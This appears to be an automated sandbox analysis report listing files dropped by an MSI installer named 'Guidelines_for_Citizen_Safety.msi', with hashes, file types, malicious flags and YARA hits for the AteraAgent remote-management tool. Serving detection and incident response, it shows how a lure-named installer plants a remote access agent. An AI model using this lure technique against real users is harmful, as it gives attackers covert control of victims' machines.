                                                                                                                                                                                                                                                                          SHA-256:87C97269E2B68898BE87B884CD6A21880E6F15336B1194713E12A2DB45F1DCCF
                                                                                                                                                                                                                                                                          SHA-512:1343ED80DCCF0FA4E7AE837B68926619D734BC52785B586A4F4102D205497D2715F951D9ACACC8C3E5434A94837820493173040DC90FB7339A34B6F3EF0288D0
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):25600
                                                                                                                                                                                                                                                                          Entropy (8bit):5.009968638752024
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:384:akuS4rIWmFo967HkYc/4CmvZqVZa9VSlkfO2IROklJhwaHr1LpvTVi:RuVs3bXCmvZqu3u9OiNL1LpvTs
                                                                                                                                                                                                                                                                          MD5:AA1B9C5C685173FAD2DABEBEB3171F01
                                                                                                                                                                                                                                                                          SHA1:ED756B1760E563CE888276FF248C734B7DD851FB
                                                                                                                                                                                                                                                                          SHA-256:E44A6582CD3F84F4255D3C230E0A2C284E0CFFA0CA5E62E4D749E089555494C7
                                                                                                                                                                                                                                                                          SHA-512:D3BFB4BD7E7FDB7159FBFC14056067C813CE52CDD91E885BDAAC36820B5385FB70077BF58EC434D31A5A48245EB62B6794794618C73FE7953F79A4FC26592334
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Installer\MSI87B3.tmp-\AlphaControlAgentInstallation.dll, Author: Joe Security
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1538
                                                                                                                                                                                                                                                                          Entropy (8bit):4.735670966653348
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:2dhmhx0PY6Iee7LfKhT06XWslTh17jJB+aZtG9jDqRp:c0nd5t7q7WsFD7t3tG96n
                                                                                                                                                                                                                                                                          MD5:BC17E956CDE8DD5425F2B2A68ED919F8
                                                                                                                                                                                                                                                                          SHA1:5E3736331E9E2F6BF851E3355F31006CCD8CAA99
                                                                                                                                                                                                                                                                          SHA-256:E4FF538599C2D8E898D7F90CCF74081192D5AFA8040E6B6C180F3AA0F46AD2C5
                                                                                                                                                                                                                                                                          SHA-512:02090DAF1D5226B33EDAAE80263431A7A5B35A2ECE97F74F494CC138002211E71498D42C260395ED40AEE8E4A40474B395690B8B24E4AEE19F0231DA7377A940
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup useLegacyV2RuntimeActivationPolicy="true">.... .. Use supportedRuntime tags to explicitly specify the version(s) of the .NET Framework runtime that.. the custom action should run on. If no versions are specified, the chosen version of the runtime.. will be the "best" match to what Microsoft.Deployment.WindowsInstaller.dll was built against..... WARNING: leaving the version unspecified is dangerous as it introduces a risk of compatibility.. problems with future versions of the .NET Framework runtime. It is highly recommended that you specify.. only the version(s) of the .NET Framework runtime that you have tested against..... Note for .NET Framework v3.0 and v3.5, the runtime version is still v2.0..... In order to enable .NET Framework version 2.0 runtime activation policy, which is to load all assemblies.. by using the latest
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):184240
                                                                                                                                                                                                                                                                          Entropy (8bit):5.876033362692288
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3072:BGfZS7hUuK3PcbFeRRLxyR69UgoCaf8+aCnfKlRUjW01KymkO:9zMRLkR6joxfRPW
                                                                                                                                                                                                                                                                          MD5:1A5CAEA6734FDD07CAA514C3F3FB75DA
                                                                                                                                                                                                                                                                          SHA1:F070AC0D91BD337D7952ABD1DDF19A737B94510C
                                                                                                                                                                                                                                                                          SHA-256:CF06D4ED4A8BAF88C82D6C9AE0EFC81C469DE6DA8788AB35F373B350A4B4CDCA
                                                                                                                                                                                                                                                                          SHA-512:A22DD3B7CF1C2EDCF5B540F3DAA482268D8038D468B8F00CA623D1C254AFFBBC1446E5BD42ADC3D8E274BE3BA776B0034E179FACCD9AC8612CCD75186D1E3BF1
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):711952
                                                                                                                                                                                                                                                                          Entropy (8bit):5.96669864901384
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12288:WBARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTU+:WBA/ZTvQD0XY0AJBSjRlXP36RMG7
                                                                                                                                                                                                                                                                          MD5:715A1FBEE4665E99E859EDA667FE8034
                                                                                                                                                                                                                                                                          SHA1:E13C6E4210043C4976DCDC447EA2B32854F70CC6
                                                                                                                                                                                                                                                                          SHA-256:C5C83BBC1741BE6FF4C490C0AEE34C162945423EC577C646538B2D21CE13199E
                                                                                                                                                                                                                                                                          SHA-512:BF9744CCB20F8205B2DE39DBE79D34497B4D5C19B353D0F95E87EA7EF7FA1784AEA87E10EFCEF11E4C90451EAA47A379204EB0533AA3018E378DD3511CE0E8AD
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):61448
                                                                                                                                                                                                                                                                          Entropy (8bit):6.332072334718381
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:768:xieZDWtg+ESsRTgCayrMkp6SEI9016UJKdi1diF55U/h:xwg+ESsVgCayY/pYgwkd0Eh
                                                                                                                                                                                                                                                                          MD5:878E361C41C05C0519BFC72C7D6E141C
                                                                                                                                                                                                                                                                          SHA1:432EF61862D3C7A95AB42DF36A7CAF27D08DC98F
                                                                                                                                                                                                                                                                          SHA-256:24DE61B5CAB2E3495FE8D817FB6E80094662846F976CF38997987270F8BBAE40
                                                                                                                                                                                                                                                                          SHA-512:59A7CBB9224EE28A0F3D88E5F0C518B248768FF0013189C954A3012463E5C0BA63A7297497131C9C0306332646AF935DD3A1ACF0D3E4E449351C28EC9F1BE1FA
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):437348
                                                                                                                                                                                                                                                                          Entropy (8bit):6.648137068438554
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12288:6t3jOZy2KsGU6a4Ksht3jOZy2KsGU6a4KsT:CzOE2Z34KGzOE2Z34KI
                                                                                                                                                                                                                                                                          MD5:56B28B24351849E7467AFE43841CB321
                                                                                                                                                                                                                                                                          SHA1:5F5EBEEFC79074F1F21715ACEDF0DA636873EDF0
                                                                                                                                                                                                                                                                          SHA-256:9C3BF9E7CFAF415AB66D3D47267FCD992AD5B656D7A2B9DD6372312650E7DB31
                                                                                                                                                                                                                                                                          SHA-512:B3F415DB85276BEC2145FD0B76DBEEEC3FE144783A0BDBFFA4AEC608B54736259FA38902D1601C6852B1296106E17C9D453809968E88CD2E16C632701E8EBE66
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Installer\MSI8A82.tmp, Author: Joe Security
                                                                                                                                                                                                                                                                          Preview:...@IXOS.@.....@.)xY.@.....@.....@.....@.....@.....@......&.{E732A0D7-A2F2-4657-AC41-B19742648E45}..AteraAgent!.Guidelines_for_Citizen_Safety.msi.@.....@.....@.....@........&.{721AD955-79FD-4019-BBF5-9DCC4C1175BB}.....@.....@.....@.....@.......@.....@.....@.......@......AteraAgent......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........StopAteraServiceQuiet....J...StopAteraServiceQuiet.@A......M..MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........................^.......\......].........................,.......<.........L...'.....'.....'.P.......8.....'.....Rich............................PE..L...Ap.]...........!.........P............................................................@.........................@................P..x....................`..........T...............................@...............<............................text...[
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):216496
                                                                                                                                                                                                                                                                          Entropy (8bit):6.646208142644182
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3072:/Jz/kyKA1X1dxbOZU32KndB4GLvyui2lhQtEaY4IDflQn0xHuudQ+cxEHSiZxaQ:/t/kE1jOZy2KL4GBiwQtEa4L2sV
                                                                                                                                                                                                                                                                          MD5:A3AE5D86ECF38DB9427359EA37A5F646
                                                                                                                                                                                                                                                                          SHA1:EB4CB5FF520717038ADADCC5E1EF8F7C24B27A90
                                                                                                                                                                                                                                                                          SHA-256:C8D190D5BE1EFD2D52F72A72AE9DFA3940AB3FACEB626405959349654FE18B74
                                                                                                                                                                                                                                                                          SHA-512:96ECB3BC00848EEB2836E289EF7B7B2607D30790FFD1AE0E0ACFC2E14F26A991C6E728B8DC67280426E478C70231F9E13F514E52C8CE7D956C1FAD0E322D98E0
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):216496
                                                                                                                                                                                                                                                                          Entropy (8bit):6.646208142644182
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3072:/Jz/kyKA1X1dxbOZU32KndB4GLvyui2lhQtEaY4IDflQn0xHuudQ+cxEHSiZxaQ:/t/kE1jOZy2KL4GBiwQtEa4L2sV
                                                                                                                                                                                                                                                                          MD5:A3AE5D86ECF38DB9427359EA37A5F646
                                                                                                                                                                                                                                                                          SHA1:EB4CB5FF520717038ADADCC5E1EF8F7C24B27A90
                                                                                                                                                                                                                                                                          SHA-256:C8D190D5BE1EFD2D52F72A72AE9DFA3940AB3FACEB626405959349654FE18B74
                                                                                                                                                                                                                                                                          SHA-512:96ECB3BC00848EEB2836E289EF7B7B2607D30790FFD1AE0E0ACFC2E14F26A991C6E728B8DC67280426E478C70231F9E13F514E52C8CE7D956C1FAD0E322D98E0
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):216496
                                                                                                                                                                                                                                                                          Entropy (8bit):6.646208142644182
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3072:/Jz/kyKA1X1dxbOZU32KndB4GLvyui2lhQtEaY4IDflQn0xHuudQ+cxEHSiZxaQ:/t/kE1jOZy2KL4GBiwQtEa4L2sV
                                                                                                                                                                                                                                                                          MD5:A3AE5D86ECF38DB9427359EA37A5F646
                                                                                                                                                                                                                                                                          SHA1:EB4CB5FF520717038ADADCC5E1EF8F7C24B27A90
                                                                                                                                                                                                                                                                          SHA-256:C8D190D5BE1EFD2D52F72A72AE9DFA3940AB3FACEB626405959349654FE18B74
                                                                                                                                                                                                                                                                          SHA-512:96ECB3BC00848EEB2836E289EF7B7B2607D30790FFD1AE0E0ACFC2E14F26A991C6E728B8DC67280426E478C70231F9E13F514E52C8CE7D956C1FAD0E322D98E0
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):521954
                                                                                                                                                                                                                                                                          Entropy (8bit):7.356225107100806
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12288:GnBaimP+DJLxQb6CBCldjCaOIM7PmD8WoKO2qHxf:kG2D3QbCldj1MK/tzG
                                                                                                                                                                                                                                                                          MD5:88D29734F37BDCFFD202EAFCDD082F9D
                                                                                                                                                                                                                                                                          SHA1:823B40D05A1CAB06B857ED87451BF683FDD56A5E
                                                                                                                                                                                                                                                                          SHA-256:87C97269E2B68898BE87B884CD6A21880E6F15336B1194713E12A2DB45F1DCCF
                                                                                                                                                                                                                                                                          SHA-512:1343ED80DCCF0FA4E7AE837B68926619D734BC52785B586A4F4102D205497D2715F951D9ACACC8C3E5434A94837820493173040DC90FB7339A34B6F3EF0288D0
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):25600
                                                                                                                                                                                                                                                                          Entropy (8bit):5.009968638752024
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:384:akuS4rIWmFo967HkYc/4CmvZqVZa9VSlkfO2IROklJhwaHr1LpvTVi:RuVs3bXCmvZqu3u9OiNL1LpvTs
                                                                                                                                                                                                                                                                          MD5:AA1B9C5C685173FAD2DABEBEB3171F01
                                                                                                                                                                                                                                                                          SHA1:ED756B1760E563CE888276FF248C734B7DD851FB
                                                                                                                                                                                                                                                                          SHA-256:E44A6582CD3F84F4255D3C230E0A2C284E0CFFA0CA5E62E4D749E089555494C7
                                                                                                                                                                                                                                                                          SHA-512:D3BFB4BD7E7FDB7159FBFC14056067C813CE52CDD91E885BDAAC36820B5385FB70077BF58EC434D31A5A48245EB62B6794794618C73FE7953F79A4FC26592334
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Installer\MSIA9F5.tmp-\AlphaControlAgentInstallation.dll, Author: Joe Security
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1538
                                                                                                                                                                                                                                                                          Entropy (8bit):4.735670966653348
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:2dhmhx0PY6Iee7LfKhT06XWslTh17jJB+aZtG9jDqRp:c0nd5t7q7WsFD7t3tG96n
                                                                                                                                                                                                                                                                          MD5:BC17E956CDE8DD5425F2B2A68ED919F8
                                                                                                                                                                                                                                                                          SHA1:5E3736331E9E2F6BF851E3355F31006CCD8CAA99
                                                                                                                                                                                                                                                                          SHA-256:E4FF538599C2D8E898D7F90CCF74081192D5AFA8040E6B6C180F3AA0F46AD2C5
                                                                                                                                                                                                                                                                          SHA-512:02090DAF1D5226B33EDAAE80263431A7A5B35A2ECE97F74F494CC138002211E71498D42C260395ED40AEE8E4A40474B395690B8B24E4AEE19F0231DA7377A940
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup useLegacyV2RuntimeActivationPolicy="true">.... .. Use supportedRuntime tags to explicitly specify the version(s) of the .NET Framework runtime that.. the custom action should run on. If no versions are specified, the chosen version of the runtime.. will be the "best" match to what Microsoft.Deployment.WindowsInstaller.dll was built against..... WARNING: leaving the version unspecified is dangerous as it introduces a risk of compatibility.. problems with future versions of the .NET Framework runtime. It is highly recommended that you specify.. only the version(s) of the .NET Framework runtime that you have tested against..... Note for .NET Framework v3.0 and v3.5, the runtime version is still v2.0..... In order to enable .NET Framework version 2.0 runtime activation policy, which is to load all assemblies.. by using the latest
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):184240
                                                                                                                                                                                                                                                                          Entropy (8bit):5.876033362692288
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3072:BGfZS7hUuK3PcbFeRRLxyR69UgoCaf8+aCnfKlRUjW01KymkO:9zMRLkR6joxfRPW
                                                                                                                                                                                                                                                                          MD5:1A5CAEA6734FDD07CAA514C3F3FB75DA
                                                                                                                                                                                                                                                                          SHA1:F070AC0D91BD337D7952ABD1DDF19A737B94510C
                                                                                                                                                                                                                                                                          SHA-256:CF06D4ED4A8BAF88C82D6C9AE0EFC81C469DE6DA8788AB35F373B350A4B4CDCA
                                                                                                                                                                                                                                                                          SHA-512:A22DD3B7CF1C2EDCF5B540F3DAA482268D8038D468B8F00CA623D1C254AFFBBC1446E5BD42ADC3D8E274BE3BA776B0034E179FACCD9AC8612CCD75186D1E3BF1
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):711952
                                                                                                                                                                                                                                                                          Entropy (8bit):5.96669864901384
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12288:WBARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTU+:WBA/ZTvQD0XY0AJBSjRlXP36RMG7
                                                                                                                                                                                                                                                                          MD5:715A1FBEE4665E99E859EDA667FE8034
                                                                                                                                                                                                                                                                          SHA1:E13C6E4210043C4976DCDC447EA2B32854F70CC6
                                                                                                                                                                                                                                                                          SHA-256:C5C83BBC1741BE6FF4C490C0AEE34C162945423EC577C646538B2D21CE13199E
                                                                                                                                                                                                                                                                          SHA-512:BF9744CCB20F8205B2DE39DBE79D34497B4D5C19B353D0F95E87EA7EF7FA1784AEA87E10EFCEF11E4C90451EAA47A379204EB0533AA3018E378DD3511CE0E8AD
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):61448
                                                                                                                                                                                                                                                                          Entropy (8bit):6.332072334718381
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:768:xieZDWtg+ESsRTgCayrMkp6SEI9016UJKdi1diF55U/h:xwg+ESsVgCayY/pYgwkd0Eh
                                                                                                                                                                                                                                                                          MD5:878E361C41C05C0519BFC72C7D6E141C
                                                                                                                                                                                                                                                                          SHA1:432EF61862D3C7A95AB42DF36A7CAF27D08DC98F
                                                                                                                                                                                                                                                                          SHA-256:24DE61B5CAB2E3495FE8D817FB6E80094662846F976CF38997987270F8BBAE40
                                                                                                                                                                                                                                                                          SHA-512:59A7CBB9224EE28A0F3D88E5F0C518B248768FF0013189C954A3012463E5C0BA63A7297497131C9C0306332646AF935DD3A1ACF0D3E4E449351C28EC9F1BE1FA
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):20480
                                                                                                                                                                                                                                                                          Entropy (8bit):1.173915831942788
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:JSbX72Fjs6AGiLIlHVRpUh/7777777777777777777777777vDHFlmJC1c/Xl0i5:JO6QI5EP86F
                                                                                                                                                                                                                                                                          MD5:2FB05FDA2F83919E8A9507261360E010
                                                                                                                                                                                                                                                                          SHA1:0168A2C6A3450E50513B207243E289503174800C
                                                                                                                                                                                                                                                                          SHA-256:BCB3ECDDDE353A7115D77BBF3D6591A155786D8C0AA2466F9208B3F5C5DC8B86
                                                                                                                                                                                                                                                                          SHA-512:28BE04E0978F3D7C2082A33F804B9CA70DC347AF197E23E1A588FACA524E65D7EDC5E97543BD6B5D39946552C7613E1A537586632003DFA5D66AA9B40A1F9020
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):20480
                                                                                                                                                                                                                                                                          Entropy (8bit):1.5756843868543453
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:CJ8Ph9uRc06WXJKFT5B9PqISoedGPdGfMpr7MONStedGPdGRubkZn:Nh91BFTv9iIB7oYZ
                                                                                                                                                                                                                                                                          MD5:D36078FC13607F98C31714BEC1ECEABA
                                                                                                                                                                                                                                                                          SHA1:2E863BE55D1FEEA70F4DCF32A46E754C1C7015FE
                                                                                                                                                                                                                                                                          SHA-256:2B33B8B1305B5C18EFAB55AE78BB813B5E465A9BE8365ABB098CD7DE526E0DC1
                                                                                                                                                                                                                                                                          SHA-512:6CFA4F0CA554583F2FD0097236A02083D3029DDA64C39B9FC9B6B9972DB499A0E936220CAE802F85F81F3D9EB6016C3914E71F7B97C1CB5CC949069505F4765C
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Installer\inprogressinstallinfo.ipi, Author: Joe Security
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):360001
                                                                                                                                                                                                                                                                          Entropy (8bit):5.362967125642403
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26Kgaub:zTtbmkExhMJCIpEy
                                                                                                                                                                                                                                                                          MD5:D7C66A0AA6FDC674D76C1AF96FFA2534
                                                                                                                                                                                                                                                                          SHA1:1524C76F45A6070AD68784A0326E6525D7E4A8A0
                                                                                                                                                                                                                                                                          SHA-256:6B2D7FF6E73457156DBA7BE86405D0B54DD0788D05DC3A88202209B4FD80D687
                                                                                                                                                                                                                                                                          SHA-512:FD66A710DA635288CF3DD11ADAE2B72B96865A15308BA871270D59C565A2D4A4FB34CDFDE2A54381FE7B1503EAEE301C3006F7F2875C2E07F861AA60B36B4C81
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):704
                                                                                                                                                                                                                                                                          Entropy (8bit):4.805280550692434
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:tIDRFK4mAX7RBem7hccD+PRem7hUhiiGNGNdg6MhgRBem7hccD+PRem7hUGNGNkm:Us43XVBVhcmMRVhMipNVeBVhcmMRVhro
                                                                                                                                                                                                                                                                          MD5:EF51E16A5B81AB912F2478FE0A0379D6
                                                                                                                                                                                                                                                                          SHA1:B0F9E2EE284DD1590EA31B2D3AD736D77B9FC6A7
                                                                                                                                                                                                                                                                          SHA-256:2C5D5397CEDF66DB724FED7FB4515B026A894F517A0DFBE8AE8ADF52DB61AA22
                                                                                                                                                                                                                                                                          SHA-512:296A11DB55BFEE7D87897BB63BC9E2C05786D3FD73A894DA5AF76F7A756495C6CCC0959C88844DFB5560DE2374A257201D960E004EC09D8C9DFB50952C5EF2D2
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\System32\InstallUtil.InstallLog, Author: Joe Security
                                                                                                                                                                                                                                                                          Preview:...Running a transacted installation.....Beginning the Install phase of the installation...See the contents of the log file for the C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe assembly's progress...The file is located at C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog.....The Install phase completed successfully, and the Commit phase is beginning...See the contents of the log file for the C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe assembly's progress...The file is located at C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog.....The Commit phase completed successfully.....The transacted install has completed...
